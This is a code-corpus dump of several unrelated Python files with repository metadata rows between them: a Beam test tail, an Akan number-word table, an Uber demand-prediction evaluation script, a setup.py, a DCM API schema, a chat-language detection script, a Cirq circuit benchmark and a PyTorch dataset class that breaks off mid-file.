    # Committed ("existing") state stays empty; only partial state is written.
    self.assertEqual(
        evaluator.step_context.existing_keyed_state['key'].state,
        defaultdict(lambda: defaultdict(list)))
    self.assertEqual(
        evaluator.step_context.partial_keyed_state['key'].state,
        {None: {'elements':['value']}})
    evaluator.process_element(['key', 'value2'])
    self.assertEqual(
        evaluator.step_context.existing_keyed_state['key'].state,
        defaultdict(lambda: defaultdict(list)))
    self.assertEqual(
        evaluator.step_context.partial_keyed_state['key'].state,
        {None: {'elements':['value', 'value2']}})
    # Simulate an exception (redo key/value)
    evaluator._execution_context.reset()
    evaluator.start_bundle()
    evaluator.process_element(['key', 'value'])
    self.assertEqual(
        evaluator.step_context.existing_keyed_state['key'].state,
        defaultdict(lambda: defaultdict(list)))
    self.assertEqual(
        evaluator.step_context.partial_keyed_state['key'].state,
        {None: {'elements':['value']}})
# Run the test suite with debug-level logging when executed directly.
if __name__ == '__main__':
  logging.getLogger().setLevel(logging.DEBUG)
  unittest.main()
| 35.728033 | 85 | 0.666315 |
1abfbe9c65a87f718ec052856a123254c1f8ac71 | 501 | py | Python | number_parser/data/ak.py | hellc/number-parser | 1e62fe5562f334f1fbac7eeb3b208e98b255db5f | [
"BSD-3-Clause"
] | null | null | null | number_parser/data/ak.py | hellc/number-parser | 1e62fe5562f334f1fbac7eeb3b208e98b255db5f | [
"BSD-3-Clause"
] | null | null | null | number_parser/data/ak.py | hellc/number-parser | 1e62fe5562f334f1fbac7eeb3b208e98b255db5f | [
"BSD-3-Clause"
] | null | null | null | info = {
"UNIT_NUMBERS": {
"a-ɛ-tɔ-so-hwee": 0,
"hwee": 0,
"a-ɛ-di-kane": 1,
"biako": 1,
"koro": 1,
"abien": 2,
"abiasa": 3,
"anan": 4,
"anum": 5,
"asia": 6,
"asuon": 7,
"awɔtwe": 8,
"akron": 9
},
"DIRECT_NUMBERS": {},
"TENS": {
"aduonu": 20,
"aduasa": 30
},
"HUNDREDS": {},
"BIG_POWERS_OF_TEN": {},
"SKIP_TOKENS": [],
"USE_LONG_SCALE": False
}
| 18.555556 | 28 | 0.37525 |
92da21d2fc400ccf7f84570ab8b97a5e5a19f112 | 11,872 | py | Python | MachineLearning/checkNerualNetworkResultsV2.py | ChanaRoss/Thesis | 39ab83d52055d401a3bb71da25b3458ad9196ecd | [
"Apache-2.0"
] | null | null | null | MachineLearning/checkNerualNetworkResultsV2.py | ChanaRoss/Thesis | 39ab83d52055d401a3bb71da25b3458ad9196ecd | [
"Apache-2.0"
] | 9 | 2020-03-24T17:19:30.000Z | 2022-03-11T23:55:15.000Z | MachineLearning/checkNerualNetworkResultsV2.py | ChanaRoss/Thesis | 39ab83d52055d401a3bb71da25b3458ad9196ecd | [
"Apache-2.0"
] | null | null | null | # mathematical imports -
import numpy as np
from matplotlib import pyplot as plt
from sklearn import metrics
from math import sqrt
import seaborn as sns
sns.set()
import torch
# load network imports -
import os
import sys
sys.path.insert(0, '/Users/chanaross/dev/Thesis/MachineLearning/forGPU/')
from CNN_LSTM_NeuralNet_LimitZerosV2 import Model
sys.path.insert(0, '/Users/chanaross/dev/Thesis/UtilsCode/')
from createGif import create_gif
def createRealEventsUberML_network(eventMatrix, startTime, endTime):
    """Return the slice of real events for the window [startTime, endTime).

    A zero-length window (endTime == startTime) still yields one time step,
    mirroring the single-prediction case of the network output.
    """
    window = endTime - startTime
    numTimeSteps = 1 if window == 0 else window
    return eventMatrix[startTime: startTime + numTimeSteps, :, :]
def getInputMatrixToNetwork(previousMat, sizeCnn):
    """Build the CNN input tensor from a window of past event matrices.

    :param previousMat: array of shape [seq_len, size_x, size_y].
    :param sizeCnn: side length of the square CNN receptive field.
    :return: tensor of shape [1, seq_len, sizeCnn, sizeCnn, size_x * size_y],
        where slot k holds the zero-padded sizeCnn x sizeCnn neighbourhood of
        grid cell k (row-major over x then y) for every sequence step.
        Moved to CUDA when a GPU is available.
    """
    lenSeqIn = previousMat.shape[0]
    lengthX = previousMat.shape[1]
    lengthY = previousMat.shape[2]
    temp2 = np.zeros(shape=(1, lenSeqIn, sizeCnn, sizeCnn, lengthX * lengthY))
    # Zero-pad the spatial dimensions so border cells get full-size windows.
    tempPadded = np.zeros(shape=(lenSeqIn, lengthX + sizeCnn, lengthY + sizeCnn))
    padding_size = np.floor_divide(sizeCnn, 2)
    tempPadded[:, padding_size: padding_size + lengthX, padding_size: padding_size + lengthY] = previousMat
    k = 0
    for i in range(lengthX):
        for j in range(lengthY):
            try:
                temp2[0, :, :, :, k] = tempPadded[:, i:i + sizeCnn, j: j + sizeCnn]
            except Exception:
                # Narrowed from a bare `except:` which also swallowed
                # KeyboardInterrupt/SystemExit; kept best-effort behavior.
                print("couldnt create input for cnn ")
            k += 1
    xArr = temp2
    if torch.cuda.is_available():
        xTensor = torch.Tensor(xArr).cuda()
    else:
        xTensor = torch.Tensor(xArr)
    # xTensor shape: [1, seq_len, sizeCnn, sizeCnn, size_x * size_y]
    return xTensor
def createEventDistributionUber(previousEventMatrix, my_net, eventTimeWindow, startTime, endTime):
    """
    this function calculates future events based on cnn lstm network
    :param previousEventMatrix: event matrix of previous events,
        shape [seq_len, x_size, y_size] (numpy array; advanced in place as
        predictions are fed back autoregressively)
    :param my_net: learned network
    :param eventTimeWindow: time each event is opened (for output)
    :param startTime: start time from which events are created
    :param endTime: end time to create events (start and end time define the output sequence length)
    :return: eventsPos, eventsTimeWindow, outputEventMat
    """
    # previousEventMatrix is of size: [seq_len, x_size, y_size]
    if endTime - startTime == 0:  # should output one prediction
        out_seq = 1
    else:
        out_seq = endTime - startTime
    x_size = previousEventMatrix.shape[1]
    y_size = previousEventMatrix.shape[2]
    netEventOut = torch.zeros([out_seq, x_size, y_size])
    for seq in range(out_seq):
        # Snapshot the window BEFORE predicting. The original plain
        # assignment aliased previousEventMatrix, so the roll below read
        # its own writes. (A dead my_net.forward(...) call that referenced
        # the non-existent attribute my_net.seq_len was removed here.)
        tempEventMat = np.copy(previousEventMatrix)
        input = getInputMatrixToNetwork(previousEventMatrix, my_net.cnn_input_dimension)
        k = 0
        for x in range(x_size):
            for y in range(y_size):  # calculate output for each grid_id
                testOut = my_net.forward(input[:, :, :, :, k])
                # predicted count = argmax over the class scores
                _, netEventOut[seq, x, y] = torch.max(torch.exp(testOut.data), 1)
                k += 1
        # Autoregressive roll: drop the oldest step, append the prediction.
        previousEventMatrix[0:-1, :, :] = tempEventMat[1:, :, :]
        previousEventMatrix[-1, :, :] = netEventOut[seq, :, :]
    # in the end netEventOut is a matrix of size [out_seq_len, size_x, size_y]
    eventPos = []
    eventTimes = []
    for t in range(out_seq):
        for x in range(x_size):
            for y in range(y_size):
                numEvents = netEventOut[t, x, y]
                if numEvents > 0:
                    eventPos.append(np.array([x, y]))
                    eventTimes.append(t + startTime)
    eventsPos = np.array(eventPos)
    eventTimes = np.array(eventTimes)
    eventsTimeWindow = np.column_stack([eventTimes, eventTimes + eventTimeWindow])
    return eventsPos, eventsTimeWindow, netEventOut.detach().numpy()
def getPreviousEventMat(dataInputReal, start_time, in_seq_len = 5):
    """Return the in_seq_len time steps preceding start_time, zero-padded.

    :param dataInputReal: full event matrix of shape [T, size_x, size_y].
    :param start_time: first "future" time step; history ends just before it.
    :param in_seq_len: length of the history window the network expects.
    :return: array [in_seq_len, size_x, size_y]; when fewer than in_seq_len
        steps exist before start_time the leading steps are zeros.
    """
    lastPreviousTime = start_time
    previousEventMatrix = np.zeros(shape=(in_seq_len, dataInputReal.shape[1], dataInputReal.shape[2]))
    if lastPreviousTime - in_seq_len >= 0:  # there are enough previous events known to system
        previousEventMatrix = dataInputReal[lastPreviousTime-in_seq_len:lastPreviousTime, :, :]
    else:  # need to pad results
        # Bug fix: only the first lastPreviousTime steps fit in the tail of
        # the window; the original assigned the WHOLE matrix, which raises a
        # shape mismatch whenever T != lastPreviousTime.
        previousEventMatrix[in_seq_len-lastPreviousTime:, :, :] = dataInputReal[:lastPreviousTime, :, :]
    return previousEventMatrix
def plotSpesificTime(dataReal, dataPred, t, fileName):
    """Plot real vs. predicted event heatmaps for one time step, save a PNG.

    :param dataReal: real events, shape [1, size_x, size_y].
    :param dataPred: predicted events, same shape.
    :param t: time index in 30-minute steps (2 per hour, 48 per day).
    :param fileName: output path prefix; '<fileName>_<t>.png' is written.
    """
    dataReal = dataReal.reshape(dataReal.shape[1], dataReal.shape[2])
    dataPred = dataPred.reshape(dataPred.shape[1], dataPred.shape[2])
    # Decode the 30-minute time index into week/day/hour/minute for the title.
    day = np.floor_divide(t, 2 * 24) + 1  # sunday is 1
    week = np.floor_divide(t, 2 * 24 * 7) + 14  # first week is week 14 of the year
    hour, temp = np.divmod(t, 2)
    hour += 8  # data starts from 98 but was normalized to 0
    _, hour = np.divmod(hour, 24)
    minute = temp * 30
    # Transpose and flip so the heatmap renders with y pointing up.
    # (Removed two dead np.zeros_like(...) assignments that were
    # immediately overwritten.)
    dataFixed = np.flipud(np.swapaxes(dataReal, 1, 0))
    dataFixedPred = np.flipud(np.swapaxes(dataPred, 1, 0))
    f, axes = plt.subplots(1, 2)
    ticksDict = list(range(2))
    sns.heatmap(dataFixed, cbar = False, center = 1, square=True, vmin = 0, vmax = 1, ax=axes[0], cmap = 'CMRmap_r', cbar_kws=dict(ticks=ticksDict))
    sns.heatmap(dataFixedPred, cbar=True, center=1, square=True, vmin=0, vmax=1, ax=axes[1], cmap='CMRmap_r',cbar_kws=dict(ticks=ticksDict))
    axes[0].set_title('week- {0}, day- {1},time- {2}:{3}'.format(week, day, hour, minute) + ' , Real data')
    axes[1].set_title('Predicted data')
    axes[0].set_xlabel('X axis')
    axes[0].set_ylabel('Y axis')
    axes[1].set_xlabel('X axis')
    axes[1].set_ylabel('Y axis')
    plt.savefig(fileName + '_' + str(t) + '.png')
    plt.close(f)  # close this specific figure so loops don't leak figures
    return
def main():
    """Evaluate the trained CNN-LSTM event predictor against real Uber data.

    Loads the pickled network and event matrix, runs numRuns one-step
    predictions, plots real-vs-predicted heatmaps (combined into a gif),
    and reports RMSE / accuracy / zero- and non-zero-class accuracy.
    """
    # network_path = '/Users/chanaross/dev/Thesis/MachineLearning/forGPU/GPU_results/limitedZero_500grid/'
    # network_name = 'gridSize11_epoch86_batch35_torch.pkl'
    network_path = '/Users/chanaross/dev/Thesis/MachineLearning/forGPU/GPU_results/limitedZero_backprob/'
    network_name = 'gridSize11_epoch100_batch20_torch.pkl'
    data_path = '/Users/chanaross/dev/Thesis/UberData/'
    data_name = '3D_allDataLatLonCorrected_binaryClass_500gridpickle_30min.p'
    # network_name = 'gridSize20_epoch608_batch9_torch.pkl'
    # data_path = '/Users/chanaross/dev/Thesis/UberData/'
    # data_name = '3D_allDataLatLonCorrected_500gridpickle_30min.p'
    # NOTE(review): np.load on a ".p" pickle — presumably requires
    # allow_pickle on newer numpy; confirm the numpy version in use.
    dataInputReal = np.load(data_path + data_name)
    # map_location forces CPU loading of a GPU-trained model.
    my_net = torch.load(network_path + network_name, map_location=lambda storage, loc: storage)
    my_net.eval()
    xmin = 0
    xmax = dataInputReal.shape[0]
    ymin = 0
    ymax = dataInputReal.shape[1]
    zmin = 48
    dataInputReal = dataInputReal[xmin:xmax, ymin:ymax, zmin:] #shrink matrix size for fast training in order to test model
    # dataInputReal[dataInputReal > 1] = 1
    # reshape input data for network format -
    lengthT = dataInputReal.shape[2]
    lengthX = dataInputReal.shape[0]
    lengthY = dataInputReal.shape[1]
    # reorder axes from [x, y, t] to [t, x, y]
    dataInputReal = np.swapaxes(dataInputReal, 0, 1)
    dataInputReal = np.swapaxes(dataInputReal, 0, 2)
    # dataInputReal = dataInputReal.reshape(lengthT, lengthX, lengthY)
    # Per-run metric accumulators.
    accuracy = []
    rmse = []
    numEventsCreated = []
    numEventsPredicted = []
    correct_non_zeros = []
    correct_zeros = []
    timeOut = []
    figPath = '/Users/chanaross/dev/Thesis/MachineLearning/forGPU/GPU_results/limitedZero_backprob/figures/'
    numRuns = 10
    fileName = '500grid_30min_binary_network_results_'+str(numRuns)
    for i in range(numRuns):
        print("run num:"+str(i))
        start_time = i+200
        # start_time = np.random.randint(10, dataInputReal.shape[0] - 10)
        timeOut.append(start_time)
        end_time = start_time + 0
        realMatOut = createRealEventsUberML_network(dataInputReal, start_time, end_time)
        previousEventMatrix = getPreviousEventMat(dataInputReal, start_time, my_net.sequence_size)
        eventsPos, eventsTimeWindow, netEventOut = createEventDistributionUber(previousEventMatrix, my_net, 3, start_time, end_time)
        sizeMat = netEventOut.size
        rmse.append(sqrt(metrics.mean_squared_error(realMatOut.reshape(-1), netEventOut.reshape(-1))))
        accuracy.append(np.sum(realMatOut == netEventOut) / (sizeMat))
        # Accuracy split by true class: empty vs. non-empty grid cells.
        sizeMat_zeros = netEventOut[realMatOut == 0].size
        sizeMat_non_zeros = netEventOut[realMatOut != 0].size
        if (sizeMat_non_zeros>0):
            correct_non_zeros.append(np.sum(netEventOut[realMatOut != 0] == realMatOut[realMatOut != 0]) / sizeMat_non_zeros)
        if sizeMat_zeros>0:
            correct_zeros.append(np.sum(netEventOut[realMatOut == 0] == realMatOut[realMatOut == 0]) / sizeMat_zeros)
        plotSpesificTime(realMatOut, netEventOut, start_time, figPath + fileName)
        numEventsCreated.append(np.sum(realMatOut))
        numEventsPredicted.append(np.sum(netEventOut))
        # realMatOut[realMatOut > 1] = 1
        # distMatOut[distMatOut > 1] = 1
        # accuracy1.append(np.sum(np.sum(realMatOut == distMatOut)/(realMatOut.shape[0]*realMatOut.shape[1])))
        # if (realMatOut[realMatOut!=0].size >0):
        #     non_zero_accuracy1.append(np.sum(np.sum(realMatOut[realMatOut != 0] == distMatOut[realMatOut != 0]))/(realMatOut[realMatOut != 0].size))
        #
        # if (distMatOut[distMatOut!=0].size >0):
        #     non_zero_accuracy1_dist.append(np.sum(np.sum(realMatOut[distMatOut != 0] == distMatOut[distMatOut != 0]))/(realMatOut[distMatOut != 0].size))
    # Combine the per-run heatmap PNGs into a single gif.
    listNames = [fileName + '_' + str(t) + '.png' for t in timeOut]
    create_gif(figPath, listNames, 1, fileName)
    # Summary scatter plots of the collected metrics.
    plt.scatter(range(len(accuracy)), 100 * np.array(accuracy))
    plt.xlabel('run number [#]')
    plt.ylabel('accuracy [%]')
    plt.figure()
    plt.scatter(range(len(rmse)), np.array(rmse))
    plt.xlabel('run number [#]')
    plt.ylabel('RMSE')
    plt.figure()
    plt.scatter(range(len(numEventsCreated)), np.array(numEventsCreated), label="num real events")
    plt.scatter(range(len(numEventsPredicted)), np.array(numEventsPredicted), label="num predicted")
    plt.xlabel('run number [#]')
    plt.ylabel('num events created')
    plt.legend()
    plt.figure()
    plt.scatter(range(len(numEventsCreated)), np.abs(np.array(numEventsCreated) - np.array(numEventsPredicted)),label="difference between prediction and real")
    plt.xlabel('run number [#]')
    plt.ylabel('abs. (real - pred)')
    plt.legend()
    plt.figure()
    plt.scatter(range(len(correct_zeros)), 100 * np.array(correct_zeros))
    plt.xlabel('run number [#]')
    plt.ylabel('correct_zeros')
    plt.figure()
    plt.scatter(range(len(correct_non_zeros)), 100 * np.array(correct_non_zeros))
    plt.xlabel('run number [#]')
    plt.ylabel('correct non zeros')
    print("average RMSE for " + str(numRuns) + " runs is:" + str(np.mean(np.array(rmse))))
    print("average accuracy for " + str(numRuns) + " runs is:" + str(100 * np.mean(np.array(accuracy))))
    print("average corrected zeros " + str(numRuns) + " runs is:" + str(100 * np.mean(np.array(correct_zeros))))
    print("average corrected non zeros for " + str(numRuns) + " runs is:" + str(100 * np.mean(np.array(correct_non_zeros))))
    plt.show()
    return
if __name__ == '__main__':
    main()
# NOTE(review): this print sits at module level, so it also runs on import —
# presumably it was meant to go inside the guard; confirm before moving.
print('Done.')
a7a4143c8870d06d0556cd27e8f77e78ddf3b1fa | 1,126 | py | Python | setup.py | dang-xia/cdifflib | 6ba2d7aff69de3800986107279e709a6b47fdee5 | [
"BSD-3-Clause"
] | null | null | null | setup.py | dang-xia/cdifflib | 6ba2d7aff69de3800986107279e709a6b47fdee5 | [
"BSD-3-Clause"
] | null | null | null | setup.py | dang-xia/cdifflib | 6ba2d7aff69de3800986107279e709a6b47fdee5 | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup, Extension
import sys
if sys.version_info >= (3, 0):
module1 = [Extension('_cdifflib',
sources=['_cdifflib3.c'])]
else:
module1 = [Extension('_cdifflib',
sources=['_cdifflib.c'])]
setup(name='cdifflib',
version='1.1.0',
description='C implementation of parts of difflib',
ext_modules=module1,
py_modules=['cdifflib'],
test_suite='tests',
author='Matthew Duggan',
author_email='mgithub@guarana.org',
license='BSD',
url="https://github.com/mduggan/cdifflib",
keywords="difflib c diff",
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Topic :: Software Development',
'Topic :: Text Processing :: General',
],
)
| 30.432432 | 57 | 0.566607 |
7c20fb8a0f98157f6c2d52dd4c1e4f2c5977bd52 | 3,663 | py | Python | starthinker/task/dcm_api/schema/targetableRemarketingListsListResponse.py | viohman/starthinker | 20bd2d7fd1e541eb8a2c9b7159941f667e22e38e | [
"Apache-2.0"
] | null | null | null | starthinker/task/dcm_api/schema/targetableRemarketingListsListResponse.py | viohman/starthinker | 20bd2d7fd1e541eb8a2c9b7159941f667e22e38e | [
"Apache-2.0"
] | 6 | 2021-03-19T12:00:18.000Z | 2022-02-10T09:43:42.000Z | starthinker/task/dcm_api/schema/targetableRemarketingListsListResponse.py | viohman/starthinker | 20bd2d7fd1e541eb8a2c9b7159941f667e22e38e | [
"Apache-2.0"
] | null | null | null | ###########################################################################
#
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
# BigQuery schema for the DCM/DFA Reporting API
# TargetableRemarketingListsListResponse resource: one entry per field
# (name/type/mode, plus nested fields for repeated RECORDs).
targetableRemarketingListsListResponse_Schema = [
  {
    "description": "",
    "name": "kind",
    "type": "STRING",
    "mode": "NULLABLE"
  },
  {
    "description": "",
    "name": "nextPageToken",
    "type": "STRING",
    "mode": "NULLABLE"
  },
  {
    "name": "targetableRemarketingLists",
    "type": "RECORD",
    "mode": "REPEATED",
    "fields": [
      {
        "description": "",
        "name": "accountId",
        "type": "INT64",
        "mode": "NULLABLE"
      },
      {
        "name": "active",
        "type": "BOOLEAN",
        "mode": "NULLABLE"
      },
      {
        "description": "",
        "name": "advertiserId",
        "type": "INT64",
        "mode": "NULLABLE"
      },
      # NOTE(review): the following bare list sits directly inside "fields"
      # instead of a dict entry with its own name/type — it looks like a
      # nested sub-schema (dimension-value fields) that lost its wrapper,
      # presumably a generator artifact; confirm against the schema
      # generator before changing.
      [
        {
          "description": "",
          "name": "dimensionName",
          "type": "STRING",
          "mode": "NULLABLE"
        },
        {
          "description": "",
          "name": "etag",
          "type": "STRING",
          "mode": "NULLABLE"
        },
        {
          "description": "",
          "name": "id",
          "type": "STRING",
          "mode": "NULLABLE"
        },
        {
          "description": "",
          "name": "kind",
          "type": "STRING",
          "mode": "NULLABLE"
        },
        {
          "description": "BEGINS_WITH, CONTAINS, EXACT, WILDCARD_EXPRESSION",
          "name": "matchType",
          "type": "STRING",
          "mode": "NULLABLE"
        },
        {
          "description": "",
          "name": "value",
          "type": "STRING",
          "mode": "NULLABLE"
        }
      ],
      {
        "description": "",
        "name": "description",
        "type": "STRING",
        "mode": "NULLABLE"
      },
      {
        "description": "",
        "name": "id",
        "type": "INT64",
        "mode": "NULLABLE"
      },
      {
        "description": "",
        "name": "kind",
        "type": "STRING",
        "mode": "NULLABLE"
      },
      {
        "description": "",
        "name": "lifeSpan",
        "type": "INT64",
        "mode": "NULLABLE"
      },
      {
        "description": "",
        "name": "listSize",
        "type": "INT64",
        "mode": "NULLABLE"
      },
      {
        "description": "REMARKETING_LIST_SOURCE_ADX, REMARKETING_LIST_SOURCE_DBM, REMARKETING_LIST_SOURCE_DFA, REMARKETING_LIST_SOURCE_DFP, REMARKETING_LIST_SOURCE_DMP, REMARKETING_LIST_SOURCE_GA, REMARKETING_LIST_SOURCE_GPLUS, REMARKETING_LIST_SOURCE_OTHER, REMARKETING_LIST_SOURCE_PLAY_STORE, REMARKETING_LIST_SOURCE_XFP, REMARKETING_LIST_SOURCE_YOUTUBE",
        "name": "listSource",
        "type": "STRING",
        "mode": "NULLABLE"
      },
      {
        "description": "",
        "name": "name",
        "type": "STRING",
        "mode": "NULLABLE"
      },
      {
        "description": "",
        "name": "subaccountId",
        "type": "INT64",
        "mode": "NULLABLE"
      }
    ]
  }
]
22403a6c555c9cf7d260c8024a7cd71038d72250 | 1,044 | py | Python | src/preprocessing_jl.py | h4pZ/Toxicity-in-Dota-2 | ad95feebe80ec09cf412c115d9c791045115c636 | [
"MIT"
] | 1 | 2020-07-21T19:58:06.000Z | 2020-07-21T19:58:06.000Z | src/preprocessing_jl.py | h4pZ/Toxicity-in-Dota-2 | ad95feebe80ec09cf412c115d9c791045115c636 | [
"MIT"
] | null | null | null | src/preprocessing_jl.py | h4pZ/Toxicity-in-Dota-2 | ad95feebe80ec09cf412c115d9c791045115c636 | [
"MIT"
] | null | null | null | import os
from joblib import Parallel, delayed
from langdetect import detect
import pandas as pd
from utils import get_project_path
# Parameters: resolve the project root and its data directory.
abs_project_path = get_project_path(__file__)
data_path = os.path.join(abs_project_path, "data")
# Loading the data.
df = pd.read_csv(os.path.join(data_path, "dota2_chat_messages.csv"))
# Replace NaN chat messages with empty strings so language detection
# always receives a str, never a float('nan').
df = df.fillna("")
def check_lang(text):
    """Return the detected language code for *text*.

    Falls back to the sentinel "nal" (no language) when detection fails,
    e.g. for empty or non-linguistic messages.
    """
    try:
        lang = detect(text)
    except Exception:
        # Narrowed from a bare `except:`, which would also swallow
        # KeyboardInterrupt/SystemExit and make long runs unkillable.
        lang = "nal"
    return lang
# IMPORTANT: haven't run this but discovered about joblib after doing the task
# with dask. Apparently is faster than dask since there is no graph overhead as in dask
# so from a few tests it seems that it might be faster than dask for about 2 hours.
# Detect the language of every message across 8 worker processes.
languages = Parallel(n_jobs=8, verbose=11)(
    delayed(check_lang)(df["text"][i]) for i in range(df.shape[0]))
df["language"] = languages
df.to_csv("./data/dota2_chat_messages_lang_jl.csv", index=False)
f12c4d88e4514e1793ab4aab0ad10e768c2d123a | 3,998 | py | Python | data/p3BR/R1/benchmark/startCirq311.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/p3BR/R1/benchmark/startCirq311.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/p3BR/R1/benchmark/startCirq311.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=3
# total number=58
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
    """Build the benchmark circuit on the given qubits.

    The gate sequence below is auto-generated (the ``# number=`` comments
    are the generator's bookkeeping ids); a measurement of all qubits under
    key ``'result'`` is appended at the end.

    Args:
        n: Declared qubit count (unused by the body; kept for the
            generator's call convention).
        input_qubit: Sequence of qubits the gates act on.

    Returns:
        cirq.Circuit: The assembled circuit.
    """
    c = cirq.Circuit()  # circuit begin
    c.append(cirq.H.on(input_qubit[0])) # number=1
    c.append(cirq.rx(-0.09738937226128368).on(input_qubit[2])) # number=2
    c.append(cirq.H.on(input_qubit[1])) # number=33
    c.append(cirq.CZ.on(input_qubit[2],input_qubit[1])) # number=34
    c.append(cirq.H.on(input_qubit[1])) # number=35
    c.append(cirq.H.on(input_qubit[1])) # number=3
    c.append(cirq.H.on(input_qubit[0])) # number=45
    c.append(cirq.CZ.on(input_qubit[1],input_qubit[0])) # number=46
    c.append(cirq.H.on(input_qubit[0])) # number=47
    c.append(cirq.Y.on(input_qubit[1])) # number=15
    c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=10
    c.append(cirq.H.on(input_qubit[1])) # number=19
    c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=20
    c.append(cirq.rx(-0.6000441968356504).on(input_qubit[1])) # number=28
    c.append(cirq.H.on(input_qubit[1])) # number=21
    c.append(cirq.H.on(input_qubit[1])) # number=30
    c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=31
    c.append(cirq.H.on(input_qubit[1])) # number=32
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=48
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=51
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=55
    c.append(cirq.X.on(input_qubit[1])) # number=56
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=57
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=53
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=50
    c.append(cirq.H.on(input_qubit[2])) # number=29
    c.append(cirq.H.on(input_qubit[1])) # number=36
    c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=37
    c.append(cirq.Y.on(input_qubit[2])) # number=44
    c.append(cirq.H.on(input_qubit[1])) # number=38
    c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=18
    c.append(cirq.Z.on(input_qubit[1])) # number=11
    c.append(cirq.rx(-1.1780972450961724).on(input_qubit[2])) # number=54
    c.append(cirq.H.on(input_qubit[1])) # number=42
    c.append(cirq.H.on(input_qubit[0])) # number=39
    c.append(cirq.CZ.on(input_qubit[1],input_qubit[0])) # number=40
    c.append(cirq.H.on(input_qubit[0])) # number=41
    c.append(cirq.CNOT.on(input_qubit[2],input_qubit[1])) # number=26
    c.append(cirq.Y.on(input_qubit[1])) # number=14
    c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=5
    c.append(cirq.X.on(input_qubit[1])) # number=6
    c.append(cirq.Z.on(input_qubit[1])) # number=8
    c.append(cirq.X.on(input_qubit[1])) # number=7
    c.append(cirq.H.on(input_qubit[2])) # number=43
    c.append(cirq.rx(-2.42845112122491).on(input_qubit[1])) # number=25
    # circuit end
    c.append(cirq.measure(*input_qubit, key='result'))
    return c
def bitstring(bits):
    """Convert an iterable of measurement results into a '0'/'1' string."""
    digits = [str(int(bit)) for bit in bits]
    return "".join(digits)
if __name__ == '__main__':
    # Place 4 qubits in a single column of the device grid.
    qubit_count = 4
    input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
    circuit = make_circuit(qubit_count,input_qubits)
    # Compile the circuit to the Sycamore sqrt-iswap gate set.
    circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
    circuit_sample_count =2000
    # Sample the circuit and histogram the measured bitstrings.
    simulator = cirq.Simulator()
    result = simulator.run(circuit, repetitions=circuit_sample_count)
    frequencies = result.histogram(key='result', fold_func=bitstring)
    # Dump frequencies, circuit depth and the circuit itself for analysis.
    writefile = open("../data/startCirq311.csv","w+")
    print(format(frequencies),file=writefile)
    print("results end", file=writefile)
    print(circuit.__len__(), file=writefile)
    print(circuit,file=writefile)
    writefile.close()
126230cb1bb49c1fa15781cb33a241f9f747890c | 943 | py | Python | old/net/dataset.py | renjunxiang/Word_Segmentation_PyTorch | 47e02745caaf8df7b7a15b0a7342808efd0d5e7e | [
"MIT"
] | 7 | 2019-04-13T16:07:17.000Z | 2022-03-15T06:34:42.000Z | old/net/dataset.py | renjunxiang/Word_Segmentation_PyTorch | 47e02745caaf8df7b7a15b0a7342808efd0d5e7e | [
"MIT"
] | 1 | 2019-12-30T10:21:39.000Z | 2019-12-30T10:21:39.000Z | old/net/dataset.py | renjunxiang/Word_Segmentation_PyTorch | 47e02745caaf8df7b7a15b0a7342808efd0d5e7e | [
"MIT"
] | 4 | 2019-03-25T00:57:34.000Z | 2021-03-17T13:40:40.000Z | import torch
from torch.utils.data import Dataset
from flair.data import Sentence
# Dataset wrappers defining how training samples are read.
class DatasetRNN(Dataset):
    """Paired (input sequence, label sequence) dataset for RNN training."""

    def __init__(self, x_seq, y_seq):
        """Store the aligned input and target sequences."""
        self.x_seq = x_seq
        self.y_seq = y_seq

    def __getitem__(self, index):
        """Return the (input, target) pair at ``index``."""
        sample = self.x_seq[index]
        target = self.y_seq[index]
        return sample, target

    def __len__(self):
        """Number of samples, given by the input sequence length."""
        return len(self.x_seq)
class DatasetBERT(Dataset):
    """Dataset that embeds tokenized texts with a BERT (flair) embedding.

    Args:
        texts: Sequence of token lists, one list per sample.
        y_seq: Sequence of labels aligned with ``texts``.
        embedding: A flair embedding object exposing ``embed(sentence)``.
    """
    def __init__(self, texts, y_seq, embedding):
        self.embedding = embedding
        self.texts = texts
        self.y_seq = y_seq
    def __getitem__(self, index):
        """Return (token-embedding tensor, label) for the sample at index."""
        text = ' '.join(self.texts[index])
        sentence = Sentence(text)
        # Some messages contain garbled emoji that make BERT hit OOV and
